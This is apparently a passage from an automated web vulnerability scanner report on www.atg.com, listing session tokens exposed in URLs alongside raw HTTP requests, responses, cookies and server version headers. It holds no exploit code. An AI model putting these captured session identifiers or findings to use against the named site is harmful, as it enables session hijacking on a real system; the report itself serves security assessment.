Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

8.30. http://www.atg.com/en/solutions/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.atg.com
Path:	/en/solutions/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+

Request

GET /en/solutions/ HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

8.31. http://www.atg.com/service/main.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.atg.com
Path:	/service/main.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200191
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200194
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200195
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200197
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200202
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200219
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200227
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200228
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200229
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200230
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200231
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200232
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200236
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200238
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200239
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=3
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=300004
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=400004
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=1
http://www.atg.com/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=19.0

Request

GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:53:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:06 GMT
Content-Length: 116200
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200191">Product & Services</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192">Platform</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199">Applications</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200227">Deployment and Performance</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200192">Platform</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200195">Adaptive Scenario Engine</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200197">Content Administration</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200194">Portal</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200199">Applications</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200">Commerce and Merchandising Products</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216">Active Primus</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200200">Commerce and Merchandising Products</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200202">Merchandising</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200228">Information Type</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200239">Knowledge Base Solutions</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=300004">Sample Code</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200230">Technical References</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200232">Customer Case Studies</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200238">Problem Reports</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200229">Product Documentation</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200236">Release Notes</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200231">Solution Sheets</a>, 
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=400004">White Papers</a>
...[SNIP]...
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=3">Other</a></dt>
<dt>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200216">Active Primus</a>
...[SNIP]...
<dd>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&topicName=&useFocusTopic=true&focusTopic=200219">Primus Enterprise Search</a>
...[SNIP]...
<span>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=1" onclick="atgss_preserveUrlHash(this)">Next</a>
...[SNIP]...
<span>
<a href="/service/main.jsp?&_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true&sfield=&dosearch=true&pn=19.0" onclick="atgss_preserveUrlHash(this)">Last</a>
...[SNIP]...

8.32. http://www.atg.com/service/main.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.atg.com
Path:	/service/main.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true

Request

Response

8.33. https://www.atg.com/en/customers/listing/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.atg.com
Path:	/en/customers/listing/

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.atg.com/en/products-services/education/schedule/?_DARGS=/en/includes/common/main-navigation.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+

Request

GET /en/customers/listing/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/en/password/request/?successURL=/en/password/request/success/&_requestid=161697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

8.34. https://www.atg.com/en/password/request/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.atg.com
Path:	/en/password/request/

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.atg.com/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+

Request

GET /en/password/request/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

8.35. https://www.atg.com/en/register/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.atg.com
Path:	/en/register/

Issue detail

The response contains the following links that appear to contain session tokens:

https://www.atg.com/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+

Request

GET /en/register/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

8.36. https://www.atg.com/service/main.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.atg.com
Path:	/service/main.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true

Request

GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
